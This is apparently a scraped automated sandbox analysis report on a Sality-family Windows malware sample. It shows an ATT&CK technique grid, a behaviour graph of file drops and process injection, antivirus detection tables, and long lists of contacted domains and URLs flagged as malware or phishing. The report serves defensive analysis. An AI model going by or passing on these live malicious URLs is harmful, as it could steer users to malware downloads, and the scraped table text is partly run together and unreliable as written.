          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Windows Service          		1
          DLL Side-Loading          		NTDS5
          File and Directory Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script32
          Process Injection          		1
          Bypass User Account Control          		LSA Secrets13
          System Information Discovery          		SSHKeylogging13
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials121
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSync31
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc Filesystem3
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt32
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467981 Sample: 1.0.0.2.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 40 www.careerdesk.org 2->40 42 g2.arrowhitech.com 2->42 44 7 other IPs or domains 2->44 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 13 other signatures 2->60 8 1.0.0.2.exe 190 25 2->8         started        signatures3 process4 dnsIp5 46 ahmediye.net 78.46.2.155, 49718, 49725, 80 HETZNER-ASDE Germany 8->46 48 www.careerdesk.org 54.244.188.177, 49712, 49720, 80 AMAZON-02US United States 8->48 50 2 other IPs or domains 8->50 26 C:\iuepn.exe, PE32 8->26 dropped 28 C:\Users\user\Desktop\VF.dll, PE32 8->28 dropped 30 C:\Users\user\AppData\Local\...\winmefmb.exe, PE32 8->30 dropped 32 2 other malicious files 8->32 dropped 62 Creates autorun.inf (USB autostart) 8->62 64 Changes security center settings (notifications, updates, antivirus, firewall) 8->64 66 Contains functionality to inject threads in other processes 8->66 68 8 other signatures 8->68 13 rksowY.exe 14 8->13         started        18 fontdrvhost.exe 8->18 injected 20 fontdrvhost.exe 8->20 injected 22 dwm.exe 8->22 injected file6 signatures7 process8 dnsIp9 52 arthur.niria.biz 44.221.84.105, 49710, 49715, 49716 AMAZON-AESUS United States 13->52 34 C:\Program Files\7-Zip\Uninstall.exe, PE32 13->34 dropped 36 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 13->36 dropped 38 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 13->38 dropped 70 Antivirus detection for dropped file 13->70 72 Multi AV Scanner detection for dropped file 13->72 74 Detected unpacking (changes PE section rights) 13->74 76 2 other signatures 13->76 24 WerFault.exe 2 13->24         started        file10 signatures11 process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1.0.0.2.exe86%VirustotalBrowse
          1.0.0.2.exe100%AviraW32/Sality.AT
          1.0.0.2.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
          C:\iuepn.exe100%AviraW32/Sality.AT
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
          C:\Users\user\AppData\Local\Temp\rksowY.exe100%AviraTR/Dldr.Small.Z.haljq
          C:\Users\user\AppData\Local\Temp\winmefmb.exe100%AviraW32/Sality.AT
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
          C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
          C:\iuepn.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\rksowY.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\winmefmb.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\rksowY.exe100%ReversingLabsWin32.Trojan.Skeeyah
          C:\Users\user\Desktop\VF.dll26%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.careerdesk.org12%VirustotalBrowse
          ddos.dnsnb8.net12%VirustotalBrowse
          ampyazilim.com.tr0%VirustotalBrowse
          apple-pie.in14%VirustotalBrowse
          arthur.niria.biz11%VirustotalBrowse
          ahmediye.net9%VirustotalBrowse
          g2.arrowhitech.com3%VirustotalBrowse
          amsamex.com8%VirustotalBrowse
          althawry.org12%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://upx.sf.net0%URL Reputationsafe
          http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
          http://amsamex.com/xs.jpg100%Avira URL Cloudmalware
          http://www.careerdesk.org/images/xs.jpg?5059c3=10531718100%Avira URL Cloudmalware
          http://www.careerdesk.org/images/xs.jpg100%Avira URL Cloudmalware
          http://www.activestate.comHolger0%Avira URL Cloudsafe
          http://www.scintilla.org/scite.rng0%VirustotalBrowse
          http://a3inforservice.com.br/images/logof.gif100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudphishing
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=283082480%Avira URL Cloudsafe
          http://www.careerdesk.org/images/xs.jpg9%VirustotalBrowse
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh0%Avira URL Cloudsafe
          http://www.klkjwre9fqwieluoi.info/100%Avira URL Cloudmalware
          http://amsamex.com/xs.jpg10%VirustotalBrowse
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540600%Avira URL Cloudsafe
          http://a3inforservice.com.br/images/logof.gif3%VirustotalBrowse
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM0%Avira URL Cloudsafe
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M0%Avira URL Cloudsafe
          http://arthur.niria.biz/xs.jpg100%Avira URL Cloudmalware
          http://arthur.niria.biz/xs.jpg?51fbda=483560101100%Avira URL Cloudmalware
          http://www.klkjwre9fqwieluoi.info/11%VirustotalBrowse
          http://amsamex.com/xs.jpg?ce2fff=94588921100%Avira URL Cloudmalware
          http://arthur.niria.biz/xs.jpg11%VirustotalBrowse
          http://accnet.ca/xs.jpg100%Avira URL Cloudmalware
          http://ahmediye.net/xs.jpg100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rars11%VirustotalBrowse
          http://www.baanboard.comBrendon0%Avira URL Cloudsafe
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP0%Avira URL Cloudsafe
          http://althawry.org/images/xs.jpg?4f8fad=260706250%Avira URL Cloudsafe
          http://althawry.org/images/xs.jpg?4f8fad=26070625d0%Avira URL Cloudsafe
          http://kukutrustnet777888.info/DisableTaskMgrSoftware100%Avira URL Cloudphishing
          https://www.smartsharesystems.com/0%Avira URL Cloudsafe
          http://ahmediye.net/xs.jpg11%VirustotalBrowse
          http://www.scintilla.org0%Avira URL Cloudsafe
          http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j0%Avira URL Cloudsafe
          http://kukutrustnet777888.info/DisableTaskMgrSoftware14%VirustotalBrowse
          http://althawry.org/images/xs.jpg100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x0%Avira URL Cloudsafe
          https://www.smartsharesystems.com/0%VirustotalBrowse
          http://ahmediye.net/xs.jpg?5827cf=57773590%Avira URL Cloudsafe
          http://accnet.ca/xs.jpg9%VirustotalBrowse
          http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif100%Avira URL Cloudmalware
          http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j7%VirustotalBrowse
          http://ahmediye.net/xs.jpg?5827cf=5777359V0%Avira URL Cloudsafe
          http://www.scintilla.org1%VirustotalBrowse
          http://apple-pie.in/images/xs.jpg100%Avira URL Cloudphishing
          http://arthur.niria.biz/xs.jpg?51fbda=48356010a100%Avira URL Cloudmalware
          http://amsamex.com/xs.jpg?ce2fff=945889216100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=213803880%Avira URL Cloudsafe
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060-0%Avira URL Cloudsafe
          http://www.develop.com0%Avira URL Cloudsafe
          http://althawry.org/images/xs.jpg?4f8fad=2607062540%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
          http://www.youku.com/playlist_show/id_25824322.html0%Avira URL Cloudsafe
          http://althawry.org/images/xs.jpg9%VirustotalBrowse
          http://www.spaceblue.com0%Avira URL Cloudsafe
          http://www.baanboard.com0%Avira URL Cloudsafe
          http://ahmediye.net/xs.jpg?e14213=738125750%Avira URL Cloudsafe
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j0%Avira URL Cloudsafe
          http://ampyazilim.com.tr/images/xs2.jpg?10%Avira URL Cloudsafe
          http://www.develop.comDeepak0%Avira URL Cloudsafe
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam0%Avira URL Cloudsafe
          http://127.0.0.1/R2_2021/ServerInfo.json0%Avira URL Cloudsafe
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310T100%Avira URL Cloudmalware
          http://kukutrustnet987.info/home.gif100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rar9100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg100%Avira URL Cloudmalware
          http://www.rftp.comJosiah0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rar6100%Avira URL Cloudmalware
          http://www.activestate.com0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net:799/cj//k1.rar4100%Avira URL Cloudmalware
          http://173.193.19.14/logo.gif100%Avira URL Cloudmalware
          http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
          http://kukutrustnet888.info/home.gif100%Avira URL Cloudmalware
          http://althawry.org/images/xs.jpg?a6d450=655999680%Avira URL Cloudsafe
          http://www.rftp.com0%Avira URL Cloudsafe
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310C100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rarL100%Avira URL Cloudmalware
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540608oI0%Avira URL Cloudsafe
          http://kukutrustnet777.info/home.gif100%Avira URL Cloudmalware
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310100%Avira URL Cloudmalware
          http://apple-pie.in/images/xs.jpg?ce2fff=121614327100%Avira URL Cloudphishing
          http://www.spaceblue.comMathias0%Avira URL Cloudsafe
          https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
          http://apple-pie.in/images/xs.jpg?554c8c=39131092100%Avira URL Cloudphishing
          http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif100%Avira URL Cloudmalware
          http://amsamex.com/xs.jpg?549590=27716560100%Avira URL Cloudmalware
          http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers100%Avira URL Cloudmalware
          http://arthur.niria.biz/xs.jpg?51fbda=48356010100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;00%Avira URL Cloudsafe
          http://www.lua.org0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net/100%Avira URL Cloudmalware
          http://g2.arrowhitech.com/xs.jpg100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?1.0%Avira URL Cloudsafe
          http://kukutrustnet777888.info/100%Avira URL Cloudphishing
          http://pan.baidu.com/s/1qWKD5ve0%Avira URL Cloudsafe
          http://89.119.67.154/testo5/100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=1604234300%Avira URL Cloudsafe
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh70%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.careerdesk.org
          		54.244.188.177
          		truetrueunknown
          ddos.dnsnb8.net
          		44.221.84.105
          		truetrueunknown
          ampyazilim.com.tr
          		37.230.104.89
          		truetrueunknown
          apple-pie.in
          		44.221.84.105
          		truetrueunknown
          arthur.niria.biz
          		44.221.84.105
          		truetrueunknown
          ahmediye.net
          		78.46.2.155
          		truetrueunknown
          amsamex.com
          		unknown
          		unknowntrueunknown
          althawry.org
          		unknown
          		unknowntrueunknown
          g2.arrowhitech.com
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.careerdesk.org/images/xs.jpg?5059c3=10531718true
          • Avira URL Cloud: malware
          		unknown
          http://ahmediye.net/xs.jpg?5827cf=5777359true
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388true
          • Avira URL Cloud: safe
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rartrue
          • Avira URL Cloud: malware
          		unknown
          http://ahmediye.net/xs.jpg?e14213=73812575true
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?1true
          • Avira URL Cloud: safe
          		unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310true
          • Avira URL Cloud: malware
          		unknown
          http://apple-pie.in/images/xs.jpg?ce2fff=121614327true
          • Avira URL Cloud: phishing
          		unknown
          http://apple-pie.in/images/xs.jpg?554c8c=39131092true
          • Avira URL Cloud: phishing
          		unknown
          http://arthur.niria.biz/xs.jpg?51fbda=48356010true
          • Avira URL Cloud: malware
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430true
          • Avira URL Cloud: safe
          		unknown
          http://www.careerdesk.org/images/xs.jpg?ad5654=34079484true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.careerdesk.org/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmptrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://amsamex.com/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 10%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://www.activestate.comHolgerSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://a3inforservice.com.br/images/logof.gif1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://ddos.dnsnb8.net:799/cj//k1.rarsrksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: phishing
          		unknown
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=283082481.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060Nh1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.klkjwre9fqwieluoi.info/1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=1603540601.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060704hM1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arthur.niria.biz/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://arthur.niria.biz/xs.jpg?51fbda=4835601011.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://amsamex.com/xs.jpg?ce2fff=945889211.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://accnet.ca/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://ahmediye.net/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://g2.arrowhitech.com/xs.jpg?f4ae4e=160354060xoP1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.baanboard.comBrendonSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://althawry.org/images/xs.jpg?4f8fad=260706251.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://althawry.org/images/xs.jpg?4f8fad=26070625d1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://kukutrustnet777888.info/DisableTaskMgrSoftware1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmpfalse
          • 14%, Virustotal, Browse
          • Avira URL Cloud: phishing
          		unknown
          https://www.smartsharesystems.com/SciTE.exe.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.scintilla.orgSciTE.exe.2.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmptrue
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://althawry.org/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://ahmediye.net/xs.jpg?5827cf=5777359V1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
